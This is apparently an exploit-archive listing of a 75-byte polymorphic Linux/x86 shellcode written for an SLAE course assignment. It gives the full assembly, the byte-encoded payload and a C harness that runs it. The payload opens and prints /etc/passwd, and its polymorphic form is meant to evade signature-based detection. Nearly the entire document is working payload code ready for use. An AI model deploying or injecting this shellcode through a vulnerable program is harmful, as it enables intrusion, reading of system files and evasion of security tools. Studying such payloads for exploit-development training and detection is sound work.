Linux/x86 Tiny Read Polymorphic Shellcode

75 bytes small Linux/x86 tiny read polymorphic shellcode.


MD5 | d6f58fd7c7c280218ab60f1656e524b7

# Title: Linux/x86 - Tiny Read Polymorphic Shellcode (75 bytes)
# Author: Xenofon Vassilakopoulos
# Date: 2020-01-09
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Blog: https://xenovass.wordpress.com/2019/06/26/slae-assignment-6-create-polymorphic-shellcode/
# Architecture: i686 GNU/Linux
# Shellcode Length: 75 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-842.php
# SLAE-ID: SLAE - 1314
# Description: polymorphic version of tiny read shellcode that reads /etc/passwd

----------------------------------- Assembly -------------------------------------

global _start

section .text

_start:

shr ecx, 16
mul ecx
mov al, 5
mov dword [esp-4], ecx
mov dword [esp-8], 0x64777373
mov dword [esp-0ch], 0x61702f63
mov dword [esp-10h], 0x74652f2f
sub esp, 10h
mov ebx, esp
mov dx, 0x1bc
int 0x80

mov ecx, ebx
mov ebx, eax

mov al, 3
mov dx, 0xffe
inc dx
int 0x80

xor eax, eax
mov al, 4
sub bl, 2
int 0x80

xor eax, eax
inc al
int 0x80

----------------------------------- Shellcode -------------------------------------

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\xc1\xe9\x10\xf7\xe1\xb0\x05\x89\x4c\x24\xfc\xc7"
"\x44\x24\xf8\x73\x73\x77\x64\xc7\x44\x24\xf4\x63"
"\x2f\x70\x61\xc7\x44\x24\xf0\x2f\x2f\x65\x74\x83"
"\xec\x10\x89\xe3\x66\xba\xbc\x01\xcd\x80\x89\xd9"
"\x89\xc3\xb0\x03\x66\xba\xfe\x0f\x66\x42\xcd\x80"
"\x31\xc0\xb0\x04\x80\xeb\x02\xcd\x80\xc1\xe8\x10"
"\xfe\xc0\xcd\x80";

main()
{
printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();
}

Related Posts